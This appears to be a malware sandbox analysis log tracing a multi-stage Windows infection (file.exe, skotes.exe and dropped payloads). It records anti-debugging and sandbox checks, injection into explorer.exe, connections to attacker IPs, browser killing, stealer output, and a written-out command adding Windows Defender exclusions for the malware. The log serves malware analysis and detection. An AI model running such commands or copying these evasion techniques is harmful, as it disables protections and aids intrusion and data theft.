Source: explorer.exe, 00000027.00000003.2845395623.000000000140D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2834435232.000000000140D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWK
Source: powershell.exe, 0000001C.00000002.2860438837.000000000874D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllig
Source: file.exe, 00000000.00000002.2113614216.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, DBFIEHDHII.exe, 00000009.00000002.2155732182.0000000000F32000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 0000000A.00000002.2184814733.0000000000FC2000.00000040.00000001.01000000.0000000E.sdmp, skotes.exe, 0000000B.00000002.2188620770.0000000000FC2000.00000040.00000001.01000000.0000000E.sdmp, skotes.exe, 0000000C.00000002.2961860919.0000000000FC2000.00000040.00000001.01000000.0000000E.sdmp, 60c1233683.exe, 00000022.00000002.2952067424.00000000003B8000.00000040.00000001.01000000.0000001A.sdmp, 50c9f14fb7.exe, 00000023.00000002.2875305125.00000000007B1000.00000040.00000001.01000000.0000001B.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000000.00000002.2114430584.00000000017B5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`
Source: explorer.exe, 00000027.00000002.2952042138.00000000013DB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: r&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wVBhC3KCkV.exe, 00000013.00000002.2504947186.000000001B58E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}3
Source: qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.2950846009.00000000009B0000.00000004.00000020.00020000.00000000.sdmp, downloaded_file.exe, 00000024.00000002.2770761069.00000000011D6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1013250001\50c9f14fb7.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Thread information set: HideFromDebugger

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013250001\50c9f14fb7.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013250001\50c9f14fb7.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013250001\50c9f14fb7.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Process queried: DebugPort

Source: C:\Users\user\Documents\DBFIEHDHII.exe

Code function: 9_2_052C032D rdtsc

9_2_052C032D

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C66AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6C66AC62

Source: C:\Users\user\Documents\DBFIEHDHII.exe	Code function: 9_2_00D7652B mov eax, dword ptr fs:[00000030h]	9_2_00D7652B
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Code function: 9_2_00D7A302 mov eax, dword ptr fs:[00000030h]	9_2_00D7A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 10_2_00E0A302 mov eax, dword ptr fs:[00000030h]	10_2_00E0A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 10_2_00E0652B mov eax, dword ptr fs:[00000030h]	10_2_00E0652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_00E0A302 mov eax, dword ptr fs:[00000030h]	11_2_00E0A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_00E0652B mov eax, dword ptr fs:[00000030h]	11_2_00E0652B

Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C66AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6C66AC62

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: WindosCPUsystem.exe.39.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 5.188.137.200 3333
Source: C:\Windows\explorer.exe	Network Connect: 154.216.20.243 443
Source: C:\Windows\explorer.exe	Network Connect: 185.157.162.216 5200

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: file.exe PID: 7396, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 50c9f14fb7.exe PID: 7704, type: MEMORYSTR

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsSystem\WindowsSystem.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsSystem\WindowsSystem.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe'
Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsSystem\WindowsSystem.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsSystem\WindowsSystem.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe'

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe

Memory written: C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe base: 400000 value starts with: 4D5A

Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe	Memory written: PID: 6952 base: 140000000 value: 4D
Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe	Memory written: PID: 6952 base: 140001000 value: NU
Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe	Memory written: PID: 6952 base: 140665000 value: DF
Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe	Memory written: PID: 6952 base: 140834000 value: 00
Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe	Memory written: PID: 6952 base: F8C010 value: 00

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\explorer.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\explorer.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write

Modifies the context of a thread in another process (thread injection)

Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe

Thread register set: target process: 6952

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\DBFIEHDHII.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\Documents\DBFIEHDHII.exe "C:\Users\user\Documents\DBFIEHDHII.exe"	Jump to behavior
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe "C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013239001\ntRoEwh.exe "C:\Users\user\AppData\Local\Temp\1013239001\ntRoEwh.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\AppData\Local\Temp\1013248041\KeaEfrP.ps1"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe "C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013250001\50c9f14fb7.exe "C:\Users\user\AppData\Local\Temp\1013250001\50c9f14fb7.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013251001\5e54822fbe.exe "C:\Users\user\AppData\Local\Temp\1013251001\5e54822fbe.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe	Process created: C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe "C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe	Process created: C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe "C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe	Process created: C:\Users\user\AppData\Roaming\XXgM7ZsSvR.exe "C:\Users\user\AppData\Roaming\XXgM7ZsSvR.exe"
Source: C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe	Process created: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe "C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe"
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\580b9vjIX7.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe "C:\Program Files (x86)\jdownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\downloaded_file.exe "C:\Users\user\AppData\Local\Temp\downloaded_file.exe"
Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe	Process created: C:\Windows\explorer.exe "C:\Windows\explorer.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsSystem\WindowsSystem.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe'
Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe	Process created: C:\Windows\explorer.exe explorer.exe

Source: C:\Users\user\AppData\Local\Temp\1013251001\5e54822fbe.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013251001\5e54822fbe.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013251001\5e54822fbe.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013251001\5e54822fbe.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C6B4760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,

0_2_6C6B4760

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C591C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint,

0_2_6C591C30

Source: qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.2958021104.00000000029DC000.00000004.00000800.00020000.00000000.sdmp, qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.2958021104.00000000028D5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerH
Source: file.exe, file.exe, 00000000.00000002.2113614216.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.2958021104.0000000002952000.00000004.00000800.00020000.00000000.sdmp, qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.2958021104.00000000028D5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: skotes.exe, skotes.exe, 0000000B.00000002.2188887652.000000000100B000.00000040.00000001.01000000.0000000E.sdmp, skotes.exe, 0000000C.00000002.2965447328.000000000100B000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: 'Program Manager
Source: qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.2958021104.00000000029DC000.00000004.00000800.00020000.00000000.sdmp, qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.2958021104.00000000028D5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: [{"Has Messengers (1153)":"N","Has Game Clients (1153)":"N","Has Media Clients (1153)":"N","Has FTP Clients (1153)":"N","Cookies Count (1671)":"25","Passwords Count (1671)":"0","Forms Count (1671)":"0","CC Count (1671)":"0","History Count (1671)":"15"},"5.0.4",5,1,"","user","506407","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Program Files (x86)\\jdownloader\\config","Unknown (Unknown)","Unknown (Unknown)","Program Manager","8.46.123.228","US / United States","New York / New York","40.7123 / -74.0068"]
Source: 60c1233683.exe, 00000022.00000002.2952067424.00000000003B8000.00000040.00000001.01000000.0000001A.sdmp	Binary or memory string: oeProgram Manager
Source: qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.2958021104.00000000029DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager`
Source: qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.2958021104.00000000029DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 0.4",5,1,"","user","506407","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Program Files (x86)\\jdownloader\\config","Unknown (Unknown)","Unknown (Unknown)","Program Manager","8.46.123.228","US / United States","New York / New York","40.7123 / -74.0068"]

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C66AE71 cpuid

0_2_6C66AE71

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1013239001\ntRoEwh.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1013239001\ntRoEwh.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1013248041\KeaEfrP.ps1 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1013250001\50c9f14fb7.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1013250001\50c9f14fb7.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1013251001\5e54822fbe.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1013251001\5e54822fbe.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Queries volume information: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
